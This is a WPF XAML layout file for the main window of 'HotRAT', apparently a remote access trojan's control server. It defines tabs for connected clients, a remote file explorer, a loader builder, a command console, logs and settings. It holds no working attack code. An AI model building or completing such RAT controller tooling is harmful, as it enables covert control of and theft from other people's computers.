HotRAT.Server/Windows/MainWindow.xaml

<Window
        xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
        xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
        xmlns:d="http://schemas.microsoft.com/expression/blend/2008"
        xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"
        xmlns:local="clr-namespace:HotRAT.Server"
        xmlns:ui="http://schemas.inkore.net/lib/ui/wpf/modern"
        xmlns:ui1="http://schemas.lepo.co/wpfui/2022/xaml"
        x:Class="HotRAT.Server.MainWindow" 
        mc:Ignorable="d"
        ui:WindowHelper.UseModernWindowStyle="True"
        ui:WindowHelper.SystemBackdropType="Mica"
        Title="MainWindow" Height="695" Width="1220" 
    Background="#FFF1F1F1"
    WindowStyle="None" MinWidth="950" MinHeight="556">
    <Grid>
        <TabControl x:Name="TabCont" ui:TabControlHelper.IsAddTabButtonVisible="False" Margin="0,40,0,0">

            <TabItem VerticalAlignment="Top" HorizontalAlignment="Left" Width="143" Height="36">
                <TabItem.Header>
                    <Grid>
                        <TextBlock Text="ClientList" HorizontalAlignment="Left" Margin="21,0,0,0"></TextBlock>
                        <ui:FontIcon Icon="{x:Static ui:SegoeFluentIcons.Devices}" HorizontalAlignment="Left"/>
                    </Grid>
                </TabItem.Header>
                <ui:Frame Source="/Pages/ClientList.xaml"/>
            </TabItem>

            <TabItem VerticalAlignment="Top" HorizontalAlignment="Left" Width="143" Height="36">
                <TabItem.Header>
                    <Grid>
                        <TextBlock Text="File Explorer" HorizontalAlignment="Left" Margin="21,0,0,0"></TextBlock>
                        <ui:FontIcon Icon="{x:Static ui:SegoeFluentIcons.FileExplorerApp}" HorizontalAlignment="Left"/>
                    </Grid>
                </TabItem.Header>
                <ui:Frame Source="/Pages/FileExplorer.xaml"/>
            </TabItem>

            <TabItem VerticalAlignment="Top" HorizontalAlignment="Left" Width="143" Height="36">
                <TabItem.Header>
                    <Grid>
                        <TextBlock Text="Build Loader" HorizontalAlignment="Left" Margin="21,0,0,0"></TextBlock>
                        <ui:FontIcon Icon="{x:Static ui:SegoeFluentIcons.AddTo}" HorizontalAlignment="Left"/>
                    </Grid>
                </TabItem.Header>
                <ui:Frame Source="/Pages/Build.xaml"></ui:Frame>
            </TabItem>

            <TabItem VerticalAlignment="Center" HorizontalAlignment="Center" Width="143" Height="36">
                <TabItem.Header>
                    <Grid>
                        <TextBlock Text="Console" HorizontalAlignment="Left" Margin="21,0,0,0"></TextBlock>
                        <ui:FontIcon Icon="{x:Static ui:SegoeFluentIcons.CommandPrompt}" HorizontalAlignment="Left"/>
                    </Grid>
                </TabItem.Header>
                <ui:Frame Source="/Pages/DOS.xaml"></ui:Frame>
            </TabItem>

            <TabItem VerticalAlignment="Center" HorizontalAlignment="Center" Width="143" Height="36">
                <TabItem.Header>
                    <Grid>
                        <TextBlock Text="Log" HorizontalAlignment="Left" Margin="21,0,0,0"/>
                        <ui:FontIcon Icon="{x:Static ui:SegoeFluentIcons.Connect}" HorizontalAlignment="Left"/>
                    </Grid>
                </TabItem.Header>
                <ui:Frame Source="/Pages/Log.xaml"/>
            </TabItem>

            <TabItem VerticalAlignment="Top" Width="143" Height="36" HorizontalAlignment="Left">
                <TabItem.Header>
                    <Grid>
                        <TextBlock Text="Settings" HorizontalAlignment="Left" Margin="21,0,0,0" Width="80"/>
                        <ui:FontIcon Icon="{x:Static ui:SegoeFluentIcons.Settings}" HorizontalAlignment="Left"/>
                    </Grid>
                </TabItem.Header>
                <ui:Frame Source="/Pages/Settings.xaml"/>
            </TabItem>
           
        </TabControl>
        <Grid VerticalAlignment="Top" Height="40">
            <ui1:Image HorizontalAlignment="Left" Height="25" VerticalAlignment="Center" Width="25" Source="/ba546e3b9b19dca325c9217d7e235dd8.png" Margin="8,0,0,0"/>
            <ui1:TextBlock HorizontalAlignment="Left" Height="18" TextWrapping="Wrap" VerticalAlignment="Center" Width="214" LineHeight="10" FontSize="14" Foreground="#FFAFAFAF" Margin="44,0,0,0">
                <Run Language="zh-cn" Text="HotRAT - Nextgen [WPF Server]"/>
            </ui1:TextBlock>
            <ui1:TextBlock x:Name="InfoTitle" Height="18" TextWrapping="Wrap" VerticalAlignment="Center" LineHeight="10" FontSize="14" Foreground="#FFAFAFAF" Margin="265,0,37,0"/>
        </Grid>
    </Grid>
</Window>
